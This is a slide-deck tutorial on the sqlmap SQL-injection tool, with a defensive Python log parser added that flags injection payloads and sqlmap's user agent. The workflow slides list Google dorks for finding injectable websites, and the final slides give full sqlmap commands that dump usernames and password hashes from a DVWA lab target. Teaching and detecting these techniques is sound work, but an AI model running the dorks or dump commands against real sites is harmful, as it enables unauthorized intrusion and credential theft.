sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
2. sqlmap
• It is an open source tool that makes SQL injection testing simpler and more effective.
• sqlmap is developed in Python.
• It comes with a powerful detection engine, many niche features for the experienced penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
3. sqlmap developed by
Bernardo Damele A. G. (@inquisb), https://twitter.com/inquisb
Miroslav Stampar (@stamparm), https://twitter.com/stamparm
4. Features of sqlmap
• It supports the following database management systems:
• MySQL
• Oracle
• PostgreSQL
• Microsoft SQL Server
• Microsoft Access
• IBM DB2
• SQLite
• Firebird
• Sybase
• SAP MaxDB
• HSQLDB
• Informix
5. Features of sqlmap
• SQL injection techniques:
1. boolean-based blind
Based on differences in the returned page, data is inferred character by character.
2. time-based blind
Based on response time differences, data is inferred character by character.
3. error-based
Uses the database error messages displayed in the page to extract data.
4. UNION query
Appends a UNION SELECT to the original query so that the extracted data is returned in the page.
5. stacked queries
Semicolons are used to inject additional statements after the original SQL query.
6. out-of-band
The injection is made to the web application and a secondary channel, such as DNS queries, is used to send the data back to a domain the tester controls.
• Enumerate users, password hashes, privileges, roles, databases, tables and columns.
• Crack password hashes using a dictionary-based attack.
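The techniques above leave characteristic traces in web server access logs. The following added example (not part of the original slides) parses constructed Apache combined-format log lines, URL-decodes the query string and classifies each request by the technique it resembles, also flagging sqlmap's default User-Agent, which starts with `sqlmap/` unless the operator overrides it. The log lines, IP addresses, timestamps and version number are constructed sample data.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines (sample data, not from the slides); they
# imitate requests the techniques above generate against DVWA's sqli_blind page.
SAMPLE_LOG = r'''
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Mar/2024:12:00:02 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%20AND%201%3D1&Submit=Submit HTTP/1.1" 200 4312 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.0.0.5 - - [10/Mar/2024:12:00:03 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%20AND%20SLEEP%285%29&Submit=Submit HTTP/1.1" 200 4301 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.0.0.5 - - [10/Mar/2024:12:00:04 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL&Submit=Submit HTTP/1.1" 200 4400 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.0.0.5 - - [10/Mar/2024:12:00:05 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%3BSELECT%201&Submit=Submit HTTP/1.1" 200 4301 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:12:00:06 +0000] "GET /dvwa/index.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
'''

# Apache "combined" log format: ip ident user [time] "METHOD path proto" status size "referer" "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Signatures for the techniques listed on this slide, most specific first so that
# e.g. "AND SLEEP(5)" is reported as time-based rather than boolean-based.
TECHNIQUES = [
    ("time-based blind", re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)),
    ("error-based", re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)),
    ("UNION query", re.compile(r"\bunion\b[\s\S]{0,20}\bselect\b", re.I)),
    ("stacked queries", re.compile(r";\s*(select|insert|update|delete|drop|exec|declare)\b", re.I)),
    ("boolean-based blind", re.compile(r"\b(and|or)\b\s+\S+\s*(=|<>|>|<)\s*\S+", re.I)),
]

def classify(query):
    """Return the technique name a (URL-encoded) query string resembles, or None."""
    decoded = unquote_plus(query)
    for name, pattern in TECHNIQUES:
        if pattern.search(decoded):
            return name
    return None

def analyse(log_text):
    """Return (ip, path, technique, sqlmap_user_agent) for every suspicious request."""
    findings = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        path, _, query = m.group("path").partition("?")
        technique = classify(query) if query else None
        sqlmap_ua = m.group("ua").lower().startswith("sqlmap")
        if technique or sqlmap_ua:
            findings.append((m.group("ip"), path, technique, sqlmap_ua))
    return findings

if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding)
```

Matching on the decoded query rather than the raw path matters because sqlmap percent-encodes spaces and operators, so a signature like `AND 1=1` never appears literally in the log.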
6. Features of sqlmap
• Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.
• Support to dump database tables entirely.
• Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables.
• Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
7. Detection
These options can be used to customize the detection phase:
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
--string=STRING String to match when query is evaluated to True
--not-string=NOT.. String to match when query is evaluated to False
--regexp=REGEXP Regexp to match when query is evaluated to True
--code=CODE HTTP code to match when query is evaluated to True
--text-only Compare pages based only on the textual content
--titles Compare pages based only on their titles
8. Extracting Information With Sqlmap
Retrieve the session user
--current-user
Retrieve the current database
--current-db
Find out whether the session user is a database administrator
--is-dba
List database system users
--users
List databases
--dbs
Retrieve the DBMS server hostname
--hostname
Retrieve the exact DBMS version, OS information, architecture and patch level
-f
9. Extracting Information With Sqlmap
List the DBMS users
--users
List all DBMS users and their password hashes
--passwords
List user privileges
--privileges
List all columns, or only those of a specific table in a database
--columns (-T <table name> -D <database>)
Execute a custom SQL query
--sql-query="<sql query to execute>"
Open an SQL shell to execute custom SQL queries interactively
--sql-shell
10. Extracting Information With Sqlmap
DBMS database to enumerate
-D (Database_name)
DBMS database table(s) to enumerate
-T (table_name)
DBMS database table column(s) to enumerate
-C (columns_name)
Dump DBMS database table entries
--dump
Dump the table entries of all DBMS databases
--dump-all
Enumerate DBMS database tables
--tables
Enumerate DBMS user roles
--roles
11. Extracting Information With Sqlmap
Retrieve DBMS banner
-b, --banner
Enumerate DBMS schema
--schema
Retrieve DBMS comments
--comments
12. Sqlmap : workflow
• Find a vulnerable website
• Google dork strings used to find potentially SQL-injectable websites:
• inurl:product-item.php?id=
• inurl:news.php?catid=
• inurl:index.php?id=
• inurl:title.php?id=
• Identify possible injection points
• Identify SQLi vulnerabilities:
• By using sqlmap
• By manual testing
• Exploit SQLi vulnerabilities
16. List tables of target database using SQLMAP SQL Injection
sqlmap -u "http://172.25.25.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=lu4bqq7h7bali86bs6hadfscd6; security=low" -D dvwa --tables
17. List columns on target table of selected database using SQLMAP SQL Injection
sqlmap -u "http://172.25.25.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=lu4bqq7h7bali86bs6hadfscd6; security=low" -D dvwa -T users --columns
18. List user and password from target columns of target table of selected database using SQLMAP SQL Injection
sqlmap -u "http://172.25.25.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=lu4bqq7h7bali86bs6hadfscd6; security=low" -D dvwa -T users -C user,user_id,password --dump